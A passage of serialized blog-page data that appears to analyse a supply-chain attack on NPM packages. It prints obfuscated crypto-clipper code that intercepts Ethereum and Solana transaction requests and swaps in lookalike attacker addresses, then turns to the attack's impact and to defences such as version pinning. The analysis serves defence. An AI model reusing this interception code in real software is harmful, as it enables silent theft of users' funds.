type":31,"value":7268},{"type":25,"tag":216,"props":101876,"children":101877},{"style":6964},[101878],{"type":31,"value":7241},{"type":25,"tag":216,"props":101880,"children":101881},{"class":6922,"line":7257},[101882,101886,101890,101894,101898,101902,101906,101910,101914],{"type":25,"tag":216,"props":101883,"children":101884},{"style":6947},[101885],{"type":31,"value":47197},{"type":25,"tag":216,"props":101887,"children":101888},{"style":6953},[101889],{"type":31,"value":6956},{"type":25,"tag":216,"props":101891,"children":101892},{"style":6973},[101893],{"type":31,"value":40174},{"type":25,"tag":216,"props":101895,"children":101896},{"style":6947},[101897],{"type":31,"value":101665},{"type":25,"tag":216,"props":101899,"children":101900},{"style":6964},[101901],{"type":31,"value":179},{"type":25,"tag":216,"props":101903,"children":101904},{"style":7047},[101905],{"type":31,"value":19377},{"type":25,"tag":216,"props":101907,"children":101908},{"style":6964},[101909],{"type":31,"value":34129},{"type":25,"tag":216,"props":101911,"children":101912},{"style":7047},[101913],{"type":31,"value":31},{"type":25,"tag":216,"props":101915,"children":101916},{"style":6964},[101917],{"type":31,"value":7633},{"type":25,"tag":216,"props":101919,"children":101920},{"class":6922,"line":7275},[101921],{"type":25,"tag":216,"props":101922,"children":101923},{"style":6964},[101924],{"type":31,"value":9823},{"type":25,"tag":216,"props":101926,"children":101927},{"class":6922,"line":7296},[101928,101932,101937,101941,101946,101950,101954],{"type":25,"tag":216,"props":101929,"children":101930},{"style":6936},[101931],{"type":31,"value":40151},{"type":25,"tag":216,"props":101933,"children":101934},{"style":6947},[101935],{"type":31,"value":101936}," processedData",{"type":25,"tag":216,"props":101938,"children":101939},{"style":6953},[101940],{"type":31,"value":6956},{"type":25,"tag":216,"props":101942,"children":101943},{"style":7047},[101944],{"type":31,"value":101945}," replaceAddresses",{"type":25,"tag":216,"props":101947,"children":101948},{"style":6964},[101949],{"type":31,"value":1850},{"type":25,"tag":216,"props":101951,"children":101952},{"style":6947},[101953],{"type":31,"value":7669},{"type":25,"tag":216,"props":101955,"children":101956},{"style":6964},[101957],{"type":31,"value":7797},{"type":25,"tag":216,"props":101959,"children":101960},{"class":6922,"line":7305},[101961,101965,101970],{"type":25,"tag":216,"props":101962,"children":101963},{"style":6936},[101964],{"type":31,"value":40151},{"type":25,"tag":216,"props":101966,"children":101967},{"style":6947},[101968],{"type":31,"value":101969}," finalResponseText",{"type":25,"tag":216,"props":101971,"children":101972},{"style":6953},[101973],{"type":31,"value":39818},{"type":25,"tag":216,"props":101975,"children":101976},{"class":6922,"line":7557},[101977,101982,101986,101990,101995,102000,102004,102008,102012,102016,102020,102024,102029],{"type":25,"tag":216,"props":101978,"children":101979},{"style":6936},[101980],{"type":31,"value":101981},"    typeof",{"type":25,"tag":216,"props":101983,"children":101984},{"style":6947},[101985],{"type":31,"value":101936},{"type":25,"tag":216,"props":101987,"children":101988},{"style":6953},[101989],{"type":31,"value":35384},{"type":25,"tag":216,"props":101991,"children":101992},{"style":8205},[101993],{"type":31,"value":101994}," 'string'",{"type":25,"tag":216,"props":101996,"children":101997},{"style":6953},[101998],{"type":31,"value":101999}," ?",{"type":25,"tag":216,"props":102001,"children":102002},{"style":6947},[102003],{"type":31,"value":101936},{"type":25,"tag":216,"props":102005,"children":102006},{"style":6953},[102007],{"type":31,"value":39079},{"type":25,"tag":216,"props":102009,"children":102010},{"style":6947},[102011],{"type":31,"value":41491},{"type":25,"tag":216,"props":102013,"children":102014},{"style":6964},[102015],{"type":31,"value":179},{"type":25,"tag":216,"props":102017,"children":102018},{"style":7047},[102019],{"type":31,"value":43196},{"type":25,"tag":216,"props":102021,"children":102022},{"style":6964},[102023],{"type":31,"value":1850},{"type":25,"tag":216,"props":102025,"children":102026},{"style":6947},[102027],{"type":31,"value":102028},"processedData",{"type":25,"tag":216,"props":102030,"children":102031},{"style":6964},[102032],{"type":31,"value":7797},{"type":25,"tag":216,"props":102034,"children":102035},{"class":6922,"line":7574},[102036,102040,102045,102049,102053,102058,102062,102067],{"type":25,"tag":216,"props":102037,"children":102038},{"style":6936},[102039],{"type":31,"value":40151},{"type":25,"tag":216,"props":102041,"children":102042},{"style":6947},[102043],{"type":31,"value":102044}," finalResponse",{"type":25,"tag":216,"props":102046,"children":102047},{"style":6953},[102048],{"type":31,"value":6956},{"type":25,"tag":216,"props":102050,"children":102051},{"style":6936},[102052],{"type":31,"value":35895},{"type":25,"tag":216,"props":102054,"children":102055},{"style":7047},[102056],{"type":31,"value":102057}," Response",{"type":25,"tag":216,"props":102059,"children":102060},{"style":6964},[102061],{"type":31,"value":1850},{"type":25,"tag":216,"props":102063,"children":102064},{"style":6947},[102065],{"type":31,"value":102066},"finalResponseText",{"type":25,"tag":216,"props":102068,"children":102069},{"style":6964},[102070],{"type":31,"value":52851},{"type":25,"tag":216,"props":102072,"children":102073},{"class":6922,"line":7591},[102074,102079,102083,102087,102092],{"type":25,"tag":216,"props":102075,"children":102076},{"style":6947},[102077],{"type":31,"value":102078},"    status:",{"type":25,"tag":216,"props":102080,"children":102081},{"style":6947},[102082],{"type":31,"value":101665},{"type":25,"tag":216,"props":102084,"children":102085},{"style":6964},[102086],{"type":31,"value":179},{"type":25,"tag":216,"props":102088,"children":102089},{"style":6947},[102090],{"type":31,"value":102091},"status",{"type":25,"tag":216,"props":102093,"children":102094},{"style":6964},[102095],{"type":31,"value":7465},{"type":25,"tag":216,"props":102097,"children":102098},{"class":6922,"line":7604},[102099,102104,102108,102112,102117],{"type":25,"tag":216,"props":102100,"children":102101},{"style":6947},[102102],{"type":31,"value":102103},"    statusText:",{"type":25,"tag":216,"props":102105,"children":102106},{"style":6947},[102107],{"type":31,"value":101665},{"type":25,"tag":216,"props":102109,"children":102110},{"style":6964},[102111],{"type":31,"value":179},{"type":25,"tag":216,"props":102113,"children":102114},{"style":6947},[102115],{"type":31,"value":102116},"statusText",{"type":25,"tag":216,"props":102118,"children":102119},{"style":6964},[102120],{"type":31,"value":7465},{"type":25,"tag":216,"props":102122,"children":102123},{"class":6922,"line":7613},[102124,102129,102133,102137,102141],{"type":25,"tag":216,"props":102125,"children":102126},{"style":6947},[102127],{"type":31,"value":102128},"    headers:",{"type":25,"tag":216,"props":102130,"children":102131},{"style":6947},[102132],{"type":31,"value":101665},{"type":25,"tag":216,"props":102134,"children":102135},{"style":6964},[102136],{"type":31,"value":179},{"type":25,"tag":216,"props":102138,"children":102139},{"style":6947},[102140],{"type":31,"value":101739},{"type":25,"tag":216,"props":102142,"children":102143},{"style":6964},[102144],{"type":31,"value":7465},{"type":25,"tag":216,"props":102146,"children":102147},{"class":6922,"line":7636},[102148],{"type":25,"tag":216,"props":102149,"children":102150},{"style":6964},[102151],{"type":31,"value":102152},"  });\n",{"type":25,"tag":216,"props":102154,"children":102155},{"class":6922,"line":7645},[102156,102160,102164],{"type":25,"tag":216,"props":102157,"children":102158},{"style":6973},[102159],{"type":31,"value":43162},{"type":25,"tag":216,"props":102161,"children":102162},{"style":6947},[102163],{"type":31,"value":102044},{"type":25,"tag":216,"props":102165,"children":102166},{"style":6964},[102167],{"type":31,"value":6967},{"type":25,"tag":216,"props":102169,"children":102170},{"class":6922,"line":7654},[102171],{"type":25,"tag":216,"props":102172,"children":102173},{"style":6964},[102174],{"type":31,"value":20536},{"type":25,"tag":6711,"props":102176,"children":102177},{"start":6778},[102178],{"type":25,"tag":2043,"props":102179,"children":102180},{},[102181],{"type":31,"value":102182},"The malware intercepted wallet requests and silently replaced the receiver address with the attacker address. Instead of a blunt substitution, it used the Levenshtein distance algorithm to pick a lookalike address, which made it harder for victims to notice funds being siphoned.",{"type":25,"tag":206,"props":102184,"children":102186},{"code":102185,"language":35327,"meta":7,"className":35325,"style":7},"if (_0x2c3d7e.method === 'eth_sendTransaction' && _0x2c3d7e.params && _0x2c3d7e.params[0]) {\n  try {\n    const _0x39ad21 = _0x1089ae(_0x2c3d7e.params[0], true);\n    _0x2c3d7e.params[0] = _0x39ad21;\n  } catch (_0x226343) {}\n} else {\n  if (\n    (_0x2c3d7e.method === 'solana_signTransaction' ||\n      _0x2c3d7e.method === 'solana_signAndSendTransaction') &&\n    _0x2c3d7e.params &&\n    _0x2c3d7e.params[0]\n  ) {\n    try {\n      let _0x5ad975 = _0x2c3d7e.params[0];\n      if (_0x5ad975.transaction) {\n        _0x5ad975 = _0x5ad975.transaction;\n      }\n      const _0x5dbe63 = _0x1089ae(_0x5ad975, false);\n      if (_0x2c3d7e.params[0].transaction) {\n        _0x2c3d7e.params[0].transaction = _0x5dbe63;\n      } else {\n        _0x2c3d7e.params[0] = _0x5dbe63;\n      }\n    } catch (_0x4b99fd) {}\n  }\n}\n",[102187],{"type":25,"tag":82,"props":102188,"children":102189},{"__ignoreMap":7},[102190,102269,102280,102337,102377,102402,102417,102428,102462,102495,102514,102541,102549,102560,102600,102629,102657,102664,102704,102747,102791,102806,102845,102852,102876,102883],{"type":25,"tag":216,"props":102191,"children":102192},{"class":6922,"line":6923},[102193,102197,102201,102206,102210,102214,102218,102223,102227,102232,102236,102241,102245,102249,102253,102257,102261,102265],{"type":25,"tag":216,"props":102194,"children":102195},{"style":6973},[102196],{"type":31,"value":19537},{"type":25,"tag":216,"props":102198,"children":102199},{"style":6964},[102200],{"type":31,"value":7016},{"type":25,"tag":216,"props":102202,"children":102203},{"style":6947},[102204],{"type":31,"value":102205},"_0x2c3d7e",{"type":25,"tag":216,"props":102207,"children":102208},{"style":6964},[102209],{"type":31,"value":179},{"type":25,"tag":216,"props":102211,"children":102212},{"style":6947},[102213],{"type":31,"value":42276},{"type":25,"tag":216,"props":102215,"children":102216},{"style":6953},[102217],{"type":31,"value":35384},{"type":25,"tag":216,"props":102219,"children":102220},{"style":8205},[102221],{"type":31,"value":102222}," 'eth_sendTransaction'",{"type":25,"tag":216,"props":102224,"children":102225},{"style":6953},[102226],{"type":31,"value":18142},{"type":25,"tag":216,"props":102228,"children":102229},{"style":6947},[102230],{"type":31,"value":102231}," _0x2c3d7e",{"type":25,"tag":216,"props":102233,"children":102234},{"style":6964},[102235],{"type":31,"value":179},{"type":25,"tag":216,"props":102237,"children":102238},{"style":6947},[102239],{"type":31,"value":102240},"params",{"type":25,"tag":216,"props":102242,"children":102243},{"style":6953},[102244],{"type":31,"value":18142},{"type":25,"tag":216,"props":102246,"children":102247},{"style":6947},[102248],{"type":31,"value":102231},{"type":25,"tag":216,"props":102250,"children":102251},{"style":6964},[102252],{"type":31,"value":179},{"type":25,"tag":216,"props":102254,"children":102255},{"style":6947},[102256],{"type":31,"value":102240},{"type":25,"tag":216,"props":102258,"children":102259},{"style":6964},[102260],{"type":31,"value":7701},{"type":25,"tag":216,"props":102262,"children":102263},{"style":6989},[102264],{"type":31,"value":1882},{"type":25,"tag":216,"props":102266,"children":102267},{"style":6964},[102268],{"type":31,"value":44588},{"type":25,"tag":216,"props":102270,"children":102271},{"class":6922,"line":6769},[102272,102276],{"type":25,"tag":216,"props":102273,"children":102274},{"style":6973},[102275],{"type":31,"value":101308},{"type":25,"tag":216,"props":102277,"children":102278},{"style":6964},[102279],{"type":31,"value":7241},{"type":25,"tag":216,"props":102281,"children":102282},{"class":6922,"line":6778},[102283,102287,102292,102296,102301,102305,102309,102313,102317,102321,102325,102329,102333],{"type":25,"tag":216,"props":102284,"children":102285},{"style":6936},[102286],{"type":31,"value":55636},{"type":25,"tag":216,"props":102288,"children":102289},{"style":6947},[102290],{"type":31,"value":102291}," _0x39ad21",{"type":25,"tag":216,"props":102293,"children":102294},{"style":6953},[102295],{"type":31,"value":6956},{"type":25,"tag":216,"props":102297,"children":102298},{"style":7047},[102299],{"type":31,"value":102300}," _0x1089ae",{"type":25,"tag":216,"props":102302,"children":102303},{"style":6964},[102304],{"type":31,"value":1850},{"type":25,"tag":216,"props":102306,"children":102307},{"style":6947},[102308],{"type":31,"value":102205},{"type":25,"tag":216,"props":102310,"children":102311},{"style":6964},[102312],{"type":31,"value":179},{"type":25,"tag":216,"props":102314,"children":102315},{"style":6947},[102316],{"type":31,"value":102240},{"type":25,"tag":216,"props":102318,"children":102319},{"style":6964},[102320],{"type":31,"value":7701},{"type":25,"tag":216,"props":102322,"children":102323},{"style":6989},[102324],{"type":31,"value":1882},{"type":25,"tag":216,"props":102326,"children":102327},{"style":6964},[102328],{"type":31,"value":27006},{"type":25,"tag":216,"props":102330,"children":102331},{"style":6936},[102332],{"type":31,"value":230},{"type":25,"tag":216,"props":102334,"children":102335},{"style":6964},[102336],{"type":31,"value":7797},{"type":25,"tag":216,"props":102338,"children":102339},{"class":6922,"line":7005},[102340,102345,102349,102353,102357,102361,102365,102369,102373],{"type":25,"tag":216,"props":102341,"children":102342},{"style":6947},[102343],{"type":31,"value":102344},"    _0x2c3d7e",{"type":25,"tag":216,"props":102346,"children":102347},{"style":6964},[102348],{"type":31,"value":179},{"type":25,"tag":216,"props":102350,"children":102351},{"style":6947},[102352],{"type":31,"value":102240},{"type":25,"tag":216,"props":102354,"children":102355},{"style":6964},[102356],{"type":31,"value":7701},{"type":25,"tag":216,"props":102358,"children":102359},{"style":6989},[102360],{"type":31,"value":1882},{"type":25,"tag":216,"props":102362,"children":102363},{"style":6964},[102364],{"type":31,"value":12614},{"type":25,"tag":216,"props":102366,"children":102367},{"style":6953},[102368],{"type":31,"value":266},{"type":25,"tag":216,"props":102370,"children":102371},{"style":6947},[102372],{"type":31,"value":102291},{"type":25,"tag":216,"props":102374,"children":102375},{"style":6964},[102376],{"type":31,"value":6967},{"type":25,"tag":216,"props":102378,"children":102379},{"class":6922,"line":7110},[102380,102384,102388,102392,102397],{"type":25,"tag":216,"props":102381,"children":102382},{"style":6964},[102383],{"type":31,"value":35430},{"type":25,"tag":216,"props":102385,"children":102386},{"style":6973},[102387],{"type":31,"value":52380},{"type":25,"tag":216,"props":102389,"children":102390},{"style":6964},[102391],{"type":31,"value":7016},{"type":25,"tag":216,"props":102393,"children":102394},{"style":6947},[102395],{"type":31,"value":102396},"_0x226343",{"type":25,"tag":216,"props":102398,"children":102399},{"style":6964},[102400],{"type":31,"value":102401},") {}\n",{"type":25,"tag":216,"props":102403,"children":102404},{"class":6922,"line":7216},[102405,102409,102413],{"type":25,"tag":216,"props":102406,"children":102407},{"style":6964},[102408],{"type":31,"value":50842},{"type":25,"tag":216,"props":102410,"children":102411},{"style":6973},[102412],{"type":31,"value":7268},{"type":25,"tag":216,"props":102414,"children":102415},{"style":6964},[102416],{"type":31,"value":7241},{"type":25,"tag":216,"props":102418,"children":102419},{"class":6922,"line":7244},[102420,102424],{"type":25,"tag":216,"props":102421,"children":102422},{"style":6973},[102423],{"type":31,"value":35356},{"type":25,"tag":216,"props":102425,"children":102426},{"style":6964},[102427],{"type":31,"value":82538},{"type":25,"tag":216,"props":102429,"children":102430},{"class":6922,"line":7257},[102431,102436,102440,102444,102448,102452,102457],{"type":25,"tag":216,"props":102432,"children":102433},{"style":6964},[102434],{"type":31,"value":102435},"    (",{"type":25,"tag":216,"props":102437,"children":102438},{"style":6947},[102439],{"type":31,"value":102205},{"type":25,"tag":216,"props":102441,"children":102442},{"style":6964},[102443],{"type":31,"value":179},{"type":25,"tag":216,"props":102445,"children":102446},{"style":6947},[102447],{"type":31,"value":42276},{"type":25,"tag":216,"props":102449,"children":102450},{"style":6953},[102451],{"type":31,"value":35384},{"type":25,"tag":216,"props":102453,"children":102454},{"style":8205},[102455],{"type":31,"value":102456}," 'solana_signTransaction'",{"type":25,"tag":216,"props":102458,"children":102459},{"style":6953},[102460],{"type":31,"value":102461}," ||\n",{"type":25,"tag":216,"props":102463,"children":102464},{"class":6922,"line":7275},[102465,102470,102474,102478,102482,102487,102491],{"type":25,"tag":216,"props":102466,"children":102467},{"style":6947},[102468],{"type":31,"value":102469},"      _0x2c3d7e",{"type":25,"tag":216,"props":102471,"children":102472},{"style":6964},[102473],{"type":31,"value":179},{"type":25,"tag":216,"props":102475,"children":102476},{"style":6947},[102477],{"type":31,"value":42276},{"type":25,"tag":216,"props":102479,"children":102480},{"style":6953},[102481],{"type":31,"value":35384},{"type":25,"tag":216,"props":102483,"children":102484},{"style":8205},[102485],{"type":31,"value":102486}," 'solana_signAndSendTransaction'",{"type":25,"tag":216,"props":102488,"children":102489},{"style":6964},[102490],{"type":31,"value":7036},{"type":25,"tag":216,"props":102492,"children":102493},{"style":6953},[102494],{"type":31,"value":87787},{"type":25,"tag":216,"props":102496,"children":102497},{"class":6922,"line":7296},[102498,102502,102506,102510],{"type":25,"tag":216,"props":102499,"children":102500},{"style":6947},[102501],{"type":31,"value":102344},{"type":25,"tag":216,"props":102503,"children":102504},{"style":6964},[102505],{"type":31,"value":179},{"type":25,"tag":216,"props":102507,"children":102508},{"style":6947},[102509],{"type":31,"value":102240},{"type":25,"tag":216,"props":102511,"children":102512},{"style":6953},[102513],{"type":31,"value":56652},{"type":25,"tag":216,"props":102515,"children":102516},{"class":6922,"line":7305},[102517,102521,102525,102529,102533,102537],{"type":25,"tag":216,"props":102518,"children":102519},{"style":6947},[102520],{"type":31,"value":102344},{"type":25,"tag":216,"props":102522,"children":102523},{"style":6964},[102524],{"type":31,"value":179},{"type":25,"tag":216,"props":102526,"children":102527},{"style":6947},[102528],{"type":31,"value":102240},{"type":25,"tag":216,"props":102530,"children":102531},{"style":6964},[102532],{"type":31,"value":7701},{"type":25,"tag":216,"props":102534,"children":102535},{"style":6989},[102536],{"type":31,"value":1882},{"type":25,"tag":216,"props":102538,"children":102539},{"style":6964},[102540],{"type":31,"value":15728},{"type":25,"tag":216,"props":102542,"children":102543},{"class":6922,"line":7557},[102544],{"type":25,"tag":216,"props":102545,"children":102546},{"style":6964},[102547],{"type":31,"value":102548},"  ) {\n",{"type":25,"tag":216,"props":102550,"children":102551},{"class":6922,"line":7574},[102552,102556],{"type":25,"tag":216,"props":102553,"children":102554},{"style":6973},[102555],{"type":31,"value":73952},{"type":25,"tag":216,"props":102557,"children":102558},{"style":6964},[102559],{"type":31,"value":7241},{"type":25,"tag":216,"props":102561,"children":102562},{"class":6922,"line":7591},[102563,102567,102572,102576,102580,102584,102588,102592,102596],{"type":25,"tag":216,"props":102564,"children":102565},{"style":6936},[102566],{"type":31,"value":12027},{"type":25,"tag":216,"props":102568,"children":102569},{"style":6947},[102570],{"type":31,"value":102571}," _0x5ad975",{"type":25,"tag":216,"props":102573,"children":102574},{"style":6953},[102575],{"type":31,"value":6956},{"type":25,"tag":216,"props":102577,"children":102578},{"style":6947},[102579],{"type":31,"value":102231},{"type":25,"tag":216,"props":102581,"children":102582},{"style":6964},[102583],{"type":31,"value":179},{"type":25,"tag":216,"props":102585,"children":102586},{"style":6947},[102587],{"type":31,"value":102240},{"type":25,"tag":216,"props":102589,"children":102590},{"style":6964},[102591],{"type":31,"value":7701},{"type":25,"tag":216,"props":102593,"children":102594},{"style":6989},[102595],{"type":31,"value":1882},{"type":25,"tag":216,"props":102597,"children":102598},{"style":6964},[102599],{"type":31,"value":35536},{"type":25,"tag":216,"props":102601,"children":102602},{"class":6922,"line":7604},[102603,102607,102611,102616,102620,102625],{"type":25,"tag":216,"props":102604,"children":102605},{"style":6973},[102606],{"type":31,"value":43250},{"type":25,"tag":216,"props":102608,"children":102609},{"style":6964},[102610],{"type":31,"value":7016},{"type":25,"tag":216,"props":102612,"children":102613},{"style":6947},[102614],{"type":31,"value":102615},"_0x5ad975",{"type":25,"tag":216,"props":102617,"children":102618},{"style":6964},[102619],{"type":31,"value":179},{"type":25,"tag":216,"props":102621,"children":102622},{"style":6947},[102623],{"type":31,"value":102624},"transaction",{"type":25,"tag":216,"props":102626,"children":102627},{"style":6964},[102628],{"type":31,"value":18761},{"type":25,"tag":216,"props":102630,"children":102631},{"class":6922,"line":7613},[102632,102637,102641,102645,102649,102653],{"type":25,"tag":216,"props":102633,"children":102634},{"style":6947},[102635],{"type":31,"value":102636},"        _0x5ad975",{"type":25,"tag":216,"props":102638,"children":102639},{"style":6953},[102640],{"type":31,"value":6956},{"type":25,"tag":216,"props":102642,"children":102643},{"style":6947},[102644],{"type":31,"value":102571},{"type":25,"tag":216,"props":102646,"children":102647},{"style":6964},[102648],{"type":31,"value":179},{"type":25,"tag":216,"props":102650,"children":102651},{"style":6947},[102652],{"type":31,"value":102624},{"type":25,"tag":216,"props":102654,"children":102655},{"style":6964},[102656],{"type":31,"value":6967},{"type":25,"tag":216,"props":102658,"children":102659},{"class":6922,"line":7636},[102660],{"type":25,"tag":216,"props":102661,"children":102662},{"style":6964},[102663],{"type":31,"value":16620},{"type":25,"tag":216,"props":102665,"children":102666},{"class":6922,"line":7645},[102667,102671,102676,102680,102684,102688,102692,102696,102700],{"type":25,"tag":216,"props":102668,"children":102669},{"style":6936},[102670],{"type":31,"value":35509},{"type":25,"tag":216,"props":102672,"children":102673},{"style":6947},[102674],{"type":31,"value":102675}," _0x5dbe63",{"type":25,"tag":216,"props":102677,"children":102678},{"style":6953},[102679],{"type":31,"value":6956},{"type":25,"tag":216,"props":102681,"children":102682},{"style":7047},[102683],{"type":31,"value":102300},{"type":25,"tag":216,"props":102685,"children":102686},{"style":6964},[102687],{"type":31,"value":1850},{"type":25,"tag":216,"props":102689,"children":102690},{"style":6947},[102691],{"type":31,"value":102615},{"type":25,"tag":216,"props":102693,"children":102694},{"style":6964},[102695],{"type":31,"value":7026},{"type":25,"tag":216,"props":102697,"children":102698},{"style":6936},[102699],{"type":31,"value":12127},{"type":25,"tag":216,"props":102701,"children":102702},{"style":6964},[102703],{"type":31,"value":7797},{"type":25,"tag":216,"props":102705,"children":102706},{"class":6922,"line":7654},[102707,102711,102715,102719,102723,102727,102731,102735,102739,102743],{"type":25,"tag":216,"props":102708,"children":102709},{"style":6973},[102710],{"type":31,"value":43250},{"type":25,"tag":216,"props":102712,"children":102713},{"style":6964},[102714],{"type":31,"value":7016},{"type":25,"tag":216,"props":102716,"children":102717},{"style":6947},[102718],{"type":31,"value":102205},{"type":25,"tag":216,"props":102720,"children":102721},{"style":6964},[102722],{"type":31,"value":179},{"type":25,"tag":216,"props":102724,"children":102725},{"style":6947},[102726],{"type":31,"value":102240},{"type":25,"tag":216,"props":102728,"children":102729},{"style":6964},[102730],{"type":31,"value":7701},{"type":25,"tag":216,"props":102732,"children":102733},{"style":6989},[102734],{"type":31,"value":1882},{"type":25,"tag":216,"props":102736,"children":102737},{"style":6964},[102738],{"type":31,"value":54317},{"type":25,"tag":216,"props":102740,"children":102741},{"style":6947},[102742],{"type":31,"value":102624},{"type":25,"tag":216,"props":102744,"children":102745},{"style":6964},[102746],{"type":31,"value":18761},{"type":25,"tag":216,"props":102748,"children":102749},{"class":6922,"line":7722},[102750,102755,102759,102763,102767,102771,102775,102779,102783,102787],{"type":25,"tag":216,"props":102751,"children":102752},{"style":6947},[102753],{"type":31,"value":102754},"        _0x2c3d7e",{"type":25,"tag":216,"props":102756,"children":102757},{"style":6964},[102758],{"type":31,"value":179},{"type":25,"tag":216,"props":102760,"children":102761},{"style":6947},[102762],{"type":31,"value":102240},{"type":25,"tag":216,"props":102764,"children":102765},{"style":6964},[102766],{"type":31,"value":7701},{"type":25,"tag":216,"props":102768,"children":102769},{"style":6989},[102770],{"type":31,"value":1882},{"type":25,"tag":216,"props":102772,"children":102773},{"style":6964},[102774],{"type":31,"value":54317},{"type":25,"tag":216,"props":102776,"children":102777},{"style":6947},[102778],{"type":31,"value":102624},{"type":25,"tag":216,"props":102780,"children":102781},{"style":6953},[102782],{"type":31,"value":6956},{"type":25,"tag":216,"props":102784,"children":102785},{"style":6947},[102786],{"type":31,"value":102675},{"type":25,"tag":216,"props":102788,"children":102789},{"style":6964},[102790],{"type":31,"value":6967},{"type":25,"tag":216,"props":102792,"children":102793},{"class":6922,"line":7730},[102794,102798,102802],{"type":25,"tag":216,"props":102795,"children":102796},{"style":6964},[102797],{"type":31,"value":42903},{"type":25,"tag":216,"props":102799,"children":102800},{"style":6973},[102801],{"type":31,"value":7268},{"type":25,"tag":216,"props":102803,"children":102804},{"style":6964},[102805],{"type":31,"value":7241},{"type":25,"tag":216,"props":102807,"children":102808},{"class":6922,"line":7760},[102809,102813,102817,102821,102825,102829,102833,102837,102841],{"type":25,"tag":216,"props":102810,"children":102811},{"style":6947},[102812],{"type":31,"value":102754},{"type":25,"tag":216,"props":102814,"children":102815},{"style":6964},[102816],{"type":31,"value":179},{"type":25,"tag":216,"props":102818,"children":102819},{"style":6947},[102820],{"type":31,"value":102240},{"type":25,"tag":216,"props":102822,"children":102823},{"style":6964},[102824],{"type":31,"value":7701},{"type":25,"tag":216,"props":102826,"children":102827},{"style":6989},[102828],{"type":31,"value":1882},{"type":25,"tag":216,"props":102830,"children":102831},{"style":6964},[102832],{"type":31,"value":12614},{"type":25,"tag":216,"props":102834,"children":102835},{"style":6953},[102836],{"type":31,"value":266},{"type":25,"tag":216,"props":102838,"children":102839},{"style":6947},[102840],{"type":31,"value":102675},{"type":25,"tag":216,"props":102842,"children":102843},{"style":6964},[102844],{"type":31,"value":6967},{"type":25,"tag":216,"props":102846,"children":102847},{"class":6922,"line":7768},[102848],{"type":25,"tag":216,"props":102849,"children":102850},{"style":6964},[102851],{"type":31,"value":16620},{"type":25,"tag":216,"props":102853,"children":102854},{"class":6922,"line":7800},[102855,102859,102863,102867,102872],{"type":25,"tag":216,"props":102856,"children":102857},{"style":6964},[102858],{"type":31,"value":19737},{"type":25,"tag":216,"props":102860,"children":102861},{"style":6973},[102862],{"type":31,"value":52380},{"type":25,"tag":216,"props":102864,"children":102865},{"style":6964},[102866],{"type":31,"value":7016},{"type":25,"tag":216,"props":102868,"children":102869},{"style":6947},[102870],{"type":31,"value":102871},"_0x4b99fd",{"type":25,"tag":216,"props":102873,"children":102874},{"style":6964},[102875],{"type":31,"value":102401},{"type":25,"tag":216,"props":102877,"children":102878},{"class":6922,"line":7808},[102879],{"type":25,"tag":216,"props":102880,"children":102881},{"style":6964},[102882],{"type":31,"value":9823},{"type":25,"tag":216,"props":102884,"children":102885},{"class":6922,"line":7868},[102886],{"type":25,"tag":216,"props":102887,"children":102888},{"style":6964},[102889],{"type":31,"value":7874},{"type":25,"tag":606,"props":102891,"children":102893},{"id":102892},"impact-of-the-attack",[102894],{"type":31,"value":102895},"Impact of the Attack",{"type":25,"tag":38,"props":102897,"children":102898},{},[102899],{"type":31,"value":102900},"Despite the attack targeting popular NPM packages, the exploit was not very successful. After two days, the attacker's wallet was only able to drain about $1000. However, the takeaway is how easily a trusted dependency can become a delivery vector for malware.",{"type":25,"tag":26,"props":102902,"children":102904},{"id":102903},"why-it-will-happen-again",[102905],{"type":31,"value":102906},"Why It Will Happen Again",{"type":25,"tag":38,"props":102908,"children":102909},{},[102910],{"type":31,"value":102911},"The decentralized nature of the open-source ecosystem, and particularly a massive registry like NPM, makes it an attractive and persistent target for attackers. Although this recent attack was quickly mitigated and financially minor, it served as a powerful and widely-publicized proof-of-concept showing how one compromised maintainer can distribute malware at scale.",{"type":25,"tag":38,"props":102913,"children":102914},{},[102915],{"type":31,"value":102916},"With over two million packages and countless layers of direct and transitive dependencies, a compromise can cascade through thousands of projects in hours. It's the classic \"needle in a haystack\" problem, except the haystack keeps growing.",{"type":25,"tag":26,"props":102918,"children":102920},{"id":102919},"what-developers-can-do",[102921],{"type":31,"value":102922},"What Developers Can Do",{"type":25,"tag":38,"props":102924,"children":102925},{},[102926],{"type":31,"value":102927},"If you are building critical systems where supply-chain attacks are an unacceptable risk in your threat model, here are some practical actions you can take:",{"type":25,"tag":606,"props":102929,"children":102931},{"id":102930},"_1-version-pinning-in-packagejson",[102932,102934],{"type":31,"value":102933},"1. Version pinning in ",{"type":25,"tag":82,"props":102935,"children":102937},{"className":102936},[],[102938],{"type":31,"value":102939},"package.json",{"type":25,"tag":38,"props":102941,"children":102942},{},[102943],{"type":31,"value":102944},"Applications get compromised by supply-chain attacks when an attacker releases a new version of an NPM package and the application automatically downloads it to have the latest package version.",{"type":25,"tag":38,"props":102946,"children":102947},{},[102948,102950,102956,102958,102963,102965,102970],{"type":31,"value":102949},"You can pin your dependency versions to make sure they won't get updated when running ",{"type":25,"tag":82,"props":102951,"children":102953},{"className":102952},[],[102954],{"type":31,"value":102955},"npm install",{"type":31,"value":102957},". To pin it, just make sure to remove the caret ",{"type":25,"tag":82,"props":102959,"children":102961},{"className":102960},[],[102962],{"type":31,"value":52903},{"type":31,"value":102964}," symbol before the version in ",{"type":25,"tag":82,"props":102966,"children":102968},{"className":102967},[],[102969],{"type":31,"value":102939},{"type":31,"value":1472},{"type":25,"tag":206,"props":102972,"children":102974},{"code":102973,"language":37960,"meta":7,"className":37958,"style":7},"\"@react-native-async-storage/async-storage\": \"1.23.1\",\n\"@react-native-community/datetimepicker\": \"8.3.0\",\n\"@react-native-community/netinfo\": \"11.4.1\",\n\"@react-native-picker/picker\": \"2.11.0\"\n",[102975],{"type":25,"tag":82,"props":102976,"children":102977},{"__ignoreMap":7},[102978,102999,103020,103041],{"type":25,"tag":216,"props":102979,"children":102980},{"class":6922,"line":6923},[102981,102986,102990,102995],{"type":25,"tag":216,"props":102982,"children":102983},{"style":8205},[102984],{"type":31,"value":102985},"\"@react-native-async-storage/async-storage\"",{"type":25,"tag":216,"props":102987,"children":102988},{"style":6964},[102989],{"type":31,"value":19288},{"type":25,"tag":216,"props":102991,"children":102992},{"style":8205},[102993],{"type":31,"value":102994},"\"1.23.1\"",{"type":25,"tag":216,"props":102996,"children":102997},{"style":6964},[102998],{"type":31,"value":7465},{"type":25,"tag":216,"props":103000,"children":103001},{"class":6922,"line":6769},[103002,103007,103011,103016],{"type":25,"tag":216,"props":103003,"children":103004},{"style":8205},[103005],{"type":31,"value":103006},"\"@react-native-community/datetimepicker\"",{"type":25,"tag":216,"props":103008,"children":103009},{"style":6964},[103010],{